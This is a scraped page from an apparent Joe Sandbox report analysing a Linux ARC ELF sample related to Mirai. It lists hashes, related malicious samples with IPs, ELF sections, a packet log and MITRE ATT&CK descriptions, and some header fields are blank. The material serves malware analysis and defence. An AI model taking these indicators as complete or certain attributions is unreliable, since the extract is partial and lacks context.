	pd4VXlGQPs.elf	Get hash	malicious	Browse	209.13.36.15
	gZAeuxYybA.elf	Get hash	malicious	Browse	201.179.202.227
	NxPjBmIj1w.elf	Get hash	malicious	Browse	200.5.241.185
	ascaris.sh4.elf	Get hash	malicious	Browse	179.39.104.99
	ATAv9VVyoV.elf	Get hash	malicious	Browse	181.21.8.108
	Y7bs6Iraea.elf	Get hash	malicious	Browse	190.174.0.79
	SecuriteInfo.com.Linux.Mirai.4338.285.20673.elf	Get hash	malicious	Browse	179.38.146.25
	7DFa9S1kbA.elf	Get hash	malicious	Browse	186.132.45.254

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.653518843178181
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	yNGgbod6dt.elf
File size:	148972
MD5:	62f1db29777c386f59a4836a2578e635
SHA1:	0adc886845b8a3a549b6d41a16c7e1644ec15908
SHA256:	2b68e82dada6e7bfa17c1ef77c4f03920d5644e34686a6e8a6ea5b809de70c1a
SHA512:	0d90e81a94196dd02191e85f9fc2aaffbc46960b33f650ea03cb879bdf7ab9bc5d628d97543c0a990049910d0aa8ae0d4a747d6da74f75a05f3cd995f5a4c009
SSDEEP:	3072:+BamDuoiU+jxgl30itMkPdWh8jIOs2GvLP54gaKuq:+BmozEtiUXuKuq
TLSH:	8FE3BEABBB8F0250C45702F40BCF5BAE6E6321509DAFC5E3AE39723B443A5C76516760
File Content Preview:	.ELF..............].........4....C......4. ...(......................0...0....... .......?..._..._..D...4A....... .......................................?..._..._..................Q.td.......................................................................

Static ELF Info

ELF header
Class:
Data:
Version:
Machine:
Version Number:
Type:
OS/ABI:
ABI Version:
Entry Point Address:
Flags:
ELF Header Size:
Program Header Offset:
Program Header Size:
Number of Program Headers:
Section Header Offset:
Section Header Size:
Number of Section Headers:
Header String Table Index:

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10114	0x114	0x22	0x0	0x6	AX	1
.text	PROGBITS	0x10138	0x138	0x1840c	0x0	0x6	AX	4
.fini	PROGBITS	0x28544	0x18544	0x16	0x0	0x6	AX	1
.rodata	PROGBITS	0x2855c	0x1855c	0xaaa4	0x0	0x2	A	4
.tbss	NOBITS	0x35fe0	0x23fe0	0x8	0x0	0x403	WAT	4
.fini_array	FINI_ARRAY	0x35fe0	0x23fe0	0x4	0x4	0x3	WA	4
.ctors	PROGBITS	0x35fe4	0x23fe4	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x35fec	0x23fec	0x8	0x0	0x3	WA	4
.got	PROGBITS	0x35ff4	0x23ff4	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x36008	0x24008	0x31c	0x0	0x3	WA	4
.bss	NOBITS	0x36324	0x24324	0x3df0	0x0	0x3	WA	4
.ARC.attributes	<unknown>	0x0	0x24324	0x32	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x24356	0x65	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000	0x10000	0x23000	0x23000	6.7860	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x23fe0	0x35fe0	0x35fe0	0x344	0x4134	4.1946	0x6	RW	0x2000	.tbss .fini_array .ctors .dtors .got .data .bss
NOTE	0x0	0x0	0x0	0x0	0x0	0.0000	0x4	R	0x4
TLS	0x23fe0	0x35fe0	0x35fe0	0x0	0x8	0.0000	0x4	R	0x4	.tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2023 16:30:54.792280912 CET	42836	443	192.168.2.23	91.189.91.43
Jan 8, 2023 16:30:55.560357094 CET	42516	80	192.168.2.23	109.202.202.202
Jan 8, 2023 16:30:55.625251055 CET	23	33410	190.173.195.220	192.168.2.23
Jan 8, 2023 16:30:55.625334024 CET	23	33410	190.173.195.220	192.168.2.23
Jan 8, 2023 16:30:55.625490904 CET	33410	23	192.168.2.23	190.173.195.220
Jan 8, 2023 16:30:55.625490904 CET	33410	23	192.168.2.23	190.173.195.220
Jan 8, 2023 16:31:03.409223080 CET	23	53566	190.107.216.65	192.168.2.23
Jan 8, 2023 16:31:03.409543991 CET	53566	23	192.168.2.23	190.107.216.65
Jan 8, 2023 16:31:11.175534964 CET	43928	443	192.168.2.23	91.189.91.42
Jan 8, 2023 16:31:21.414933920 CET	42836	443	192.168.2.23	91.189.91.43
Jan 8, 2023 16:31:25.510767937 CET	42516	80	192.168.2.23	109.202.202.202
Jan 8, 2023 16:31:52.133234978 CET	43928	443	192.168.2.23	91.189.91.42

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report yNGgbod6dt.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Errors

Runtime Messages

Yara Signatures

Initial Sample

Snort Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Linux Analysis Report
yNGgbod6dt.elf